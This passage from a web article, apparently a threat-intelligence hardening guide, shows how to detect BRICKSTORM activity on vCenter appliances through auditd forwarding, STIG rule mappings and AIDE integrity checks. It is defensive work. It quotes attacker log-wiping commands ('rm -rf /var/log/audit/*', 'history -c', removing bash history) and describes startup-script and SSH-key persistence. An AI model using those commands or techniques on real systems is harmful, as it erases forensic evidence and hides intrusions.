baseline;">/etc/audit/rules.d/audit.STIG.rules</code><span style="vertical-align: baseline;">). However, there is a restriction in the default configuration:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Local Only:</strong><span style="vertical-align: baseline;"> By default, auditd writes to a local file (</span><code style="vertical-align: baseline;">/var/log/audit/audit.log</code><span style="vertical-align: baseline;">).</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Invisible to VAMI:</strong><span style="vertical-align: baseline;"> The remote logging you configure in the VAMI (Port 5480) does not include these kernel logs by default.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">The Attack Vector: </strong><span style="vertical-align: baseline;">Actors can gain root access, perform their actions, and simply run </span><code style="vertical-align: baseline;">rm -rf /var/log/audit/*</code><span style="vertical-align: baseline;"> to delete the evidence. Unless these logs are streamed to your SIEM in real time, your forensic </span><span style="vertical-align: baseline;">trail is non-existent.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Local Log Rotation:</strong><span style="vertical-align: baseline;"> Since the local log location is </span><code style="vertical-align: baseline;">/var/log/audit/audit.log</code><span style="vertical-align: baseline;">, it is subject to rotation and deletion. If an attacker wipes this file, the remote syslog version is your only forensic record.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">All auditd logs should be forwarded via the VCSA remote syslog. Remote forwarding of auditd is dependent on a "auditd bridge" configuration. If </span><code style="vertical-align: baseline;">/etc/audisp/plugins.d/syslog.conf</code><span style="vertical-align: baseline;"> is set to </span><code style="vertical-align: baseline;">active = yes</code><span style="vertical-align: baseline;">, these logs will be tagged and forwarded. If set to no, they are stored locally only. To enable remote logging of auditd events and ensure forensic persistence, the following steps should be taken:</span></p> <h5><span style="vertical-align: baseline;">Step A: Check Service and Rule Status</span></h5> <p><span style="vertical-align: baseline;">Before activating the auditd remote logging bridge, you should determine if your VCSA is currently configured for auditd. Run these commands as root:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># 1. Check if the audit service is active systemctl status auditd # 2. List the rules currently enforced by the kernel memory auditctl -l</code></pre></div> <div class="block-paragraph_advanced"><p><span style="font-style: italic; vertical-align: baseline;">If </span><code style="font-style: italic; vertical-align: baseline;">auditctl -l</code><span style="font-style: italic; vertical-align: baseline;"> returns nothing, your rules have not been loaded, and the kernel is not "watching" for attacker behavior.</span></p> <h5><span style="vertical-align: baseline;">Step B: Check the "auditd Bridge" Status</span></h5> <p><span style="vertical-align: baseline;">Verify if kernel events are stored on the local disk or being forwarded to your remote SIEM.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Check the active status of the syslog plugin # Note: vSphere 8 still uses the /etc/audisp/ path for compatibility grep "^active" /etc/audisp/plugins.d/syslog.conf</code></pre></div> <div class="block-paragraph_advanced"><p><span style="font-style: italic; vertical-align: baseline;">I</span><span style="font-style: italic; vertical-align: baseline;">f this returns </span><code style="font-style: italic; vertical-align: baseline;">active = no</code><span style="font-style: italic; vertical-align: baseline;">, remote logging of auditd is not configured. The logs are sent only to the VCSA local disk where an attacker can easily wipe them.</span></p> <h4><span style="vertical-align: baseline;">Mapping Standard STIG Rules to Attacker TTPs</span></h4> <p><span style="vertical-align: baseline;">If your </span><code style="vertical-align: baseline;">auditctl -l</code><span style="vertical-align: baseline;"> output shows the standard rules are now loaded, you have the following rules in place mapped to identified attacker tactics, techniques, and procedures (TTPs). These rules move you from periodic auditing or threat hunting to real-time behavioral detection.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Standard STIG Rule / Key</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">TTP Phase</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Defensive Value</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-k useradd / -k userdel</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Foothold</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Creates local accounts, deploys backdoors, and deletes them within ~13 minutes. These rules log both ends of this rapid lifecycle.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-k execpriv (execve syscalls)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Binary Execution</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Triggers when the actor executes unauthorized binaries (e.g., </span><code style="vertical-align: baseline;">pg_update</code><span style="vertical-align: baseline;">, </span><code style="vertical-align: baseline;">vmp</code><span style="vertical-align: baseline;">) with root privileges.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-k perm_mod (chmod, chown)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Weaponization</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Actors use sed to inject code into startup scripts and then run </span><code style="vertical-align: baseline;">chmod +x</code><span style="vertical-align: baseline;">. This rule triggers the second the script is made executable.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-k privileged (sudo, su)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Credential Theft</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">BRICKSTEAL</code><span style="vertical-align: baseline;"> requires sudo to scrape memory and config files. This logs the original user ID even if they escalate to root.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-k modules (init_module)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Persistence</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Logs attempts to load malicious kernel modules or persistence drivers into the Photon OS.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-k shadow / -k passwd</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Anti-Forensics</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Logs any manual edits to the system's identity files used to create "trapdoor" root users.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Mapping of STIG rules</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Activating Remote Logging for auditd</span></h4> <h5><span style="vertical-align: baseline;">Step 1: Enable the Syslog Plugin</span></h5> <p><span style="vertical-align: baseline;">The Audit Dispatcher (audisp) should be configured to send events to the local syslog service so they can be forwarded via the VCSA remote syslog.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Use sed to change the status from 'no' to 'yes' sed -i 's/^active = no/active = yes/' /etc/audisp/plugins.d/syslog.conf # Verify the change grep "^active" /etc/audisp/plugins.d/syslog.conf</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Step 2: Restart the Audit Daemon</span></h5> <p><span style="vertical-align: baseline;">You should reload the service to initialize the dispatcher and the syslog bridge:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>kill -HUP $(pidof auditd)</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Step 3: Verify the Bridge Is Operational</span></h5> <p><span style="vertical-align: baseline;">Check the local system messages to ensure the plugin has started successfully:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>grep "audisp-syslog" /var/log/messages</code></pre></div> <div class="block-paragraph_advanced"><p><span style="font-style: italic; vertical-align: baseline;">You should see a message indicating the plugin has initialized or starte</span><span style="font-style: italic; vertical-align: baseline;">d.</span></p> <h5><span style="vertical-align: baseline;">Step 4: Confirm Logs Are Forwarded</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>journalctl -f | grep audit</code></pre></div> <div class="block-paragraph_advanced"><p><span style="font-style: italic; vertical-align: baseline;">You should see events with msg=audit prefix.</span></p> <p><strong style="vertical-align: baseline;">Syslog Tag (Key): </strong><span style="vertical-align: baseline;">In your SIEM, you should search for the field </span><code style="vertical-align: baseline;">msg=audit</code><span style="vertical-align: baseline;"> followed by the key="XYZ" (e.g., key="execpriv"). This allows you to filter out of standard system logs and focus only on high-fidelity security events.</span></p> <h4><span style="vertical-align: baseline;">Additional Auditd Rules</span></h4> <p><span style="vertical-align: baseline;">Based on a default audit.STIG.rules output contained in the Photon OS 4.0 STIG auditd config, these three rules should be added.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Recommended Rule Addition</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">TTP </strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Detail </strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-w /usr/bin/rpm -p x -k software_mgmt</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malware Deployment</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Detects SLAYSTYLE:</strong><span style="vertical-align: baseline;"> Logs the execution of the RPM installer. Essential for spotting the deployment of unauthorized tools or malicious packages.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-w /etc/init.d/ -p wa -k startup_scripts</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Persistence</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Detects Startup Injections:</strong><span style="vertical-align: baseline;"> Directly identifies the sed-based modifications used by threat actors to ensure backdoors survive a reboot.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">-w /root/.ssh/authorized_keys -p wa -k ssh_key_tamper</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Persistence</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Persistence Sensor:</strong><span style="vertical-align: baseline;"> Any write (</span><code style="vertical-align: baseline;">w</code><span style="vertical-align: baseline;">) to the root SSH directory is inherently suspicious and detects the "trapdoor" persistence TTP.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Additional STIG-based rules</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Advanced Intrusion Detection Environment (AIDE</span><span style="vertical-align: baseline;">)</span></h4> <p><span style="vertical-align: baseline;">While auditd provides low-level monitoring, AIDE serves as the source of digital validation for the VCSA. AIDE is a host-based file integrity monitoring (FIM) tool that is considered the industry standard for high-security Linux environments and is a requirement for </span><a href="https://stigviewer.cyberprotection.com/stigs/vmware_vsphere_8.0_vcenter_appliance_photon_os_4.0/2024-07-11/finding/V-266062" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DISA STIG compliance (PHTN-40-000237)</span></a><span style="vertical-align: baseline;">.</span></p> <p><strong style="vertical-align: baseline;">Note: </strong><span style="vertical-align: baseline;">Mandiant recommends organizations perform comprehensive testing and fine-tuning of these rules within a staging environment before production deployment to account for variations in specific vSphere configurations and operational workloads. Proper calibration of monitoring thresholds and file exclusion lists is essential to achieve an optimal signal-to-noise ratio and ensure high-fidelity alerting of unauthorized modification</span><span style="vertical-align: baseline;">s.</span></p> <h4><span style="vertical-align: baseline;">Why AIDE Is Essential Alongside auditd</span></h4> <p><span style="vertical-align: baseline;">Relying on a single telemetry stream is insufficient to counter the sophisticated tactics of BRICKSTORM. By pairing AuditD's behavioral auditing with AIDE's cryptographic integrity checks, organizations establish a mutual defense that reduces an attacker's ability to operate undetected.</span></p> <ul> <li><strong style="vertical-align: baseline;">auditd (Behavioral Monitoring): </strong><span style="vertical-align: baseline;">Captures the </span><span style="font-style: italic; vertical-align: baseline;">action</span><span style="vertical-align: baseline;"> (e.g., "Root used </span><span style="vertical-align: baseline;">sed</span><span style="vertical-align: baseline;"> to modify a script"). If an attacker achieves high-level privileges and "blinds" the audit service or wipes the local logs, the behavioral trail is lost.</span></li> <li><strong style="vertical-align: baseline;">AIDE (State Monitoring): </strong><span style="vertical-align: baseline;">Captures the </span><span style="font-style: italic; vertical-align: baseline;">result</span><span style="vertical-align: baseline;">. AIDE creates a cryptographic baseline (DNA fingerprint) of every critical system file. It does not care how a file was changed or if the audit logs were wiped; it only cares that the file is no longer authentic.</span></li> </ul> <h4><span style="vertical-align: baseline;">Using AIDE Alongside auditd</span></h4> <p><span style="vertical-align: baseline;">The following steps walk through how to verify the current AIDE integrity foundation, add </span><code style="vertical-align: baseline;">BRICKSTORM</code><span style="vertical-align: baseline;"> specific detections, and establish an immutable cryptographic baseline.</span></p> <h5><span style="vertical-align: baseline;">1: Diagnostic Assessment</span></h5> <p><span style="vertical-align: baseline;">Before modifying the environment, you should confirm the AIDE configuration status. Log in to the VCSA via SSH and run these commands as root:</span></p> <p><span style="vertical-align: baseline;">Confirm </span><a href="https://github.com/vmware/photon/blob/master/SPECS/aide/aide.spec" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AIDE</span></a><span style="vertical-align: baseline;"> is installed and compiled with the required config </span><span style="font-style: italic; vertical-align: baseline;">(WITH_AUDIT and SHA-512).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Check version and compiled options aide -v</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">2. Verify the AIDE Database</span></h5> <p><span style="vertical-align: baseline;">AIDE requires that a cryptographic baseline (snapshot) exists. Check the status of the database:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Resolve the database directory (typically /var/lib/aide) grep "@@define DBDIR" /etc/aide.conf # Check for the active database ls -lh /var/lib/aide/aide.db.gz</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">If aide.db.gz is missing, you have no baseline. If it exists but the timestamp is months old, your integrity foundation is stale and will produce high-noise alerts during a check.</span></p> <h5><span style="vertical-align: baseline;">3. Audit Current AIDE Coverage </span></h5> <p><span style="vertical-align: baseline;">Determine which parent directories are currently being monitored by the default rules:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Filter for active file selection rules grep -v "^#" /etc/aide.conf | grep "^/"</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">4. Editing AIDE Rule Set for BRICKSTORM Coverage </span></h5> <p><span style="vertical-align: baseline;">Open the configuration file. </span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>vi /etc/aide.conf</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Append these </span><code style="vertical-align: baseline;">BRICKSTORM</code><span style="vertical-align: baseline;"> specific rules to the bottom. Use the STIG rule group to ensure SHA-512 enforcement.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># --- BRICKSTORM TARGETS --- /root/.ssh STIG # Detects unauthorized SSH /lib64 STIG # Detects system-level libraries /etc/aide.conf STIG # Detects tampering with AIDE /etc/audit/ STIG # Detects attempts to edit config /etc/audisp/ STIG # Detects attempts to sever bridge</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Append the file for log exclusions to reduce noise [the ! should come before the rules that tell AIDE to watch the parent folders (like /opt or /etc)].</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># --- NOISE REDUCTION: EXCLUDE DYNAMIC LOGS --- !/var/log/.* # Ignore all standard logs !/opt/vmware/var/log/.* # Ignore vCenter-specific service logs !/var/lib/.* # Ignore dynamic database/state files</code></pre></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> Remove all # from append statements.</span></p> <h5><span style="vertical-align: baseline;">5. Initializing the AIDE Database</span></h5> <p><span style="vertical-align: baseline;">Once the rules are defined, you should generate a new cryptographic snapshot. This should only be performed when the VCSA is verified clean (e.g., immediately after patching).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># 1. Initialize the new fingerprint database aide --init # 2. Activate the database mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Copy the aide.db.gz to a read-only, off-box location. Comparing the VCSA against an off-box "Gold Image" ensures that even root-level attackers cannot hide their modifications by re-initializing the local database.</span></p> <h5><span style="vertical-align: baseline;">6. Enable the Remote Logging of AIDE Events via Logger Pipe</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Run a check and bridge the output to Syslog/SIEM aide --check | logger -t AIDE_TRAP -p local6.crit</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">7. Enable Automation of AIDE Database Check</span></h5> <p><span style="vertical-align: baseline;">To move from manual oversight to automated alerting, you should establish a recurring scheduled task. This ensures that the VCSA programmatically verifies its own state and reports any discrepancies.</span></p> <p><span style="vertical-align: baseline;">Open crontab:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>crontab -e</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Add the following edit to configure the task:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Execute check every 6 hours and send results via VCSA remote syslog 0 */6 * * * /usr/bin/aide --check | logger -t AIDE_TRAP -p local6.crit</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">8. Conduct a Test Event</span></h5> <p><span style="vertical-align: baseline;">To confirm your defense is operational and your SIEM is successfully receiving AIDE alerts, perform a simulated breach.</span></p> <p><span style="vertical-align: baseline;">Add a comment to a monitored area (e.g., /etc/rc.local):</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>echo "# Forensic Bridge Test" &gt;&gt; /etc/rc.local</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Trigger a remote event trap:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>aide --check | logger -t AIDE_TRAP -p local6.crit</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Verify the Alert: Check the VCSA remote syslog target for the tag AIDE_TRAP:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>AIDE found differences between database and filesystem!! followed by Changed files: /etc/rc.local.</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">VCSA Shell History</span><strong style="vertical-align: baseline;"> </strong></h4> <p><span style="vertical-align: baseline;">On a Photon-based VCSA, the </span><code style="vertical-align: baseline;">/root/.bash_history</code><span style="vertical-align: baseline;"> file is not replicated to any other log file, nor is it sent to a remote syslog by default. This represents a major forensic visibility gap that threat actors take advantage of to maintain their unmonitored persistence.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">The Buffer Issue:</strong><span style="vertical-align: baseline;"> Commands typed into the shell are kept in a memory buffer. They are only written (appended) to the physical file on the disk when the user logs out of the session.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">The Anti-Forensics Risk:</strong><span style="vertical-align: baseline;"> If a threat actor gains shell access, their first move is often to run </span><code style="vertical-align: baseline;">unset HISTFILE</code><span style="vertical-align: baseline;"> or </span><code style="vertical-align: baseline;">history -c</code><span style="vertical-align: baseline;">. This prevents the memory buffer from ever being written to the disk. Even if the file is written, an attacker can simply run </span><code style="vertical-align: baseline;">rm /root/.bash_history</code><span style="vertical-align: baseline;"> before exiting.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">No Remote Transmission:</strong><span style="vertical-align: baseline;"> Standard VCSA syslog configurations monitor directories like </span><code style="vertical-align: baseline;">/var/log/</code><span style="vertical-align: baseline;">. They do not monitor hidden user files like </span><code style="vertical-align: baseline;">.bash_history</code><span style="vertical-align: baseline;">.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The reason the auditd remote syslog discussed in the </span><a href="https://docs.google.com/document/d/1Qdj2nlx3yV1KoNveQ5lxFFyslKdhNXLEccIHHuYqEc8/edit?tab=t.0#heading=h.q04njdd8vhz4" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">previous steps</span></a><span style="vertical-align: baseline;"> is so critical is that it bypasses the need for </span><code style="vertical-align: baseline;">.bash_history</code><span style="vertical-align: baseline;"> entirely. auditd intercepts system calls (syscalls) at the kernel level and exfiltrates detailed forensic data including the original User ID (AUID) and command outcomes to a remote SIEM as the command is executed. This bridge ensures that even if a threat actor purges local logs or crashes the session, an immutable, real-time audit trail remains securely preserved off-appliance.</span></p> <h4><span style="vertical-align: baseline;">Logging Design Principles</span></h4> <p><span style="vertical-align: baseline;">Recent </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">CISA reporting and GTIG analysis </span></a><span style="vertical-align: baseline;">describe threat actors abusing management interfaces (including enabling SSH), making persistence-related configuration changes, and using vCenter capabilities to access high-value virtual machines. An organization's logging strategy should therefore prioritize management-plane audit trails, service-state changes, identity events, hypervisor telemetry, and centralized forwarding.</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Centralize first, then tune.</strong><span style="vertical-align: baseline;"> Forward logs off-host in near real time so an attacker cannot tamper with them by wiping local disks. Configure both VCSA and ESXi to forward to a central syslog/SIEM target.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Treat logs as Tier-0 data.</strong><span style="vertical-align: baseline;"> If vCenter is Tier-0, then vCenter/ESXi logs are also Tier-0. Restrict who can read them, who can change forwarding settings, and who can stop logging services.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Make timestamps defensible. </strong><span style="vertical-align: baseline;">Ensure consistent Network Time Protocol (NTP) across VCSA, ESXi hosts, jump boxes, and log collectors so correlation is reliable during an incident.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Log the actions that matter, not everything. </strong><span style="vertical-align: baseline;">For threat actor activity, you care less about generic "system is running" noise and more about: who accessed management, what changed, what was cloned/exported, what services were enabled, what binaries/configs were modified, and where the appliance/host talked to on the network.</span></p> </li> </ol> <p><span style="vertical-align: baseline;">Organizations should establish a "</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">vSphere logging fundamentals</span></a><span style="vertical-align: baseline;">" previously described by Mandiant by offloading all infrastructure logs to a centralized, remote SIEM. </span></p> <h5><span style="vertical-align: baseline;">The vSphere Unified Logging Architecture</span></h5> <p><span style="vertical-align: baseline;">The following summary table provides a definitive map of the vSphere telemetry streams described. By implementing these steps, organizations can move from a single localized log to a multilayered remote detection architecture that covers the entire </span><code style="vertical-align: baseline;">BRICKSTORM</code><span style="vertical-align: baseline;"> malware lifecycle.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Type</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Forensic Layer</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Signal Observed </strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">TTP Phase</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Detail </strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">vCenter Application Events</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 